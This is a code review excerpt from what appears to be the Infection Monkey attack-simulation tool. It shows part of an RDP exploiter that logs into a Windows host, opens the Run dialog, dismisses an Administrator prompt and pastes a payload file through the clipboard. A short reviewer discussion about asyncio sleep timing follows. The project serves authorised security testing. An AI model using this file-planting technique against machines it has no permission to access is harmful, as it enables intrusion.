monkey/agent_plugins/exploiters/rdp/src/rdp_client.py

```diff
@@ -0,0 +1,276 @@
+        dest: PurePath,
+        login_timeout: float,
+        file_upload_timeout: float,
+    ):
+        try:
+            wait_for_screen_task = self._event_loop.create_task(
+                self._wait_for_machine_screen(login_timeout)
+            )
+            self._event_loop.run_until_complete(wait_for_screen_task)
+            is_screen_up = wait_for_screen_task.result()
+
+            logger.debug(f"Is the screen up? {is_screen_up}")
+            if not is_screen_up:
+                raise Exception(f"Desktop screen did not load in {login_timeout} seconds!")
+
+            copy_file_task = self._event_loop.create_task(
+                self._copy_file(file, dest, file_upload_timeout)
+            )
+            self._event_loop.run_until_complete(copy_file_task)
+        except asyncio.TimeoutError:
+            logger.error(f"Failed to copy file to host after {file_upload_timeout} seconds")
+            raise
+        except Exception as err:
+            self._event_loop.close()
+            raise err
+
+    async def _copy_file(self, file: bytes, dest: PurePath, timeout: float):
+        # Handle any open modal dialogs
+        logger.debug("Restarting file explorer")
+        await self._remote_restart_file_explorer()
+
+        # Open a window to the destination
+        logger.debug("Opening a window to the destination")
+        await self._open_windows_run_dialog()
+        await self._send_keys(str(PureWindowsPath(dest.parent)))
+        await self._send_vk_keypress(VK_RETURN)
+        # Wait for window to appear
+        await asyncio.sleep(5)
+        logger.debug(f"Opened file explorer to: {str(PureWindowsPath(dest.parent))}")
+
+        # Handle "Administrator" prompt
+        await self._send_vk_keypress(VK_RETURN)
+        logger.debug("Handled potential prompt")
+
+        logger.debug("Copying a file to clipboard")
+        # Put the file in the clipboard
+        self._file_provider.set_files({dest.name: file})
+        await self._connection.set_current_clipboard_files([dest.name])
+        await asyncio.sleep(0.5)  # Yield time for the clipboard to sync
+        logger.debug("Agent copied to clipboard")
+
+        logger.debug("Paste the file")
+        async with asyncio.timeout(timeout):
+            await self._remote_paste()
+            while self._file_provider.is_download_active():
+                await asyncio.sleep(1)
+
+    async def _wait_for_machine_screen(self, timeout: float) -> bool:
+        timer = EggTimer()
+        timer.set(timeout)
+        logger.debug(f"Timeout for screen up: {timeout}")
+        while not timer.is_expired():
+            await asyncio.sleep(1)
+
+            await self._open_windows_run_dialog()
+            await self._send_keys(RDP_HANDSHAKE)
+            await self._copy_selected_text_to_clipboard()
+            remote_clipboard = await self._connection.get_current_clipboard_text()
+            await asyncio.sleep(0.5)  # Yield time for the clipboard to sync
```

Comment:
Can we just use `yield`?

Reply:
It seems the answer is no. Looks like await `asyncio.sleep(0)` [is the "official" way to do it](https://github.com/python/asyncio/issues/284).

Reply:
Weird. Should we sleep for 0, then?

Reply:
A 0 second sleep does not seem to work very well. Perhaps the clipboard synchronization code has await calls, and therefore an await of 0 does not give it the space to do what it needs to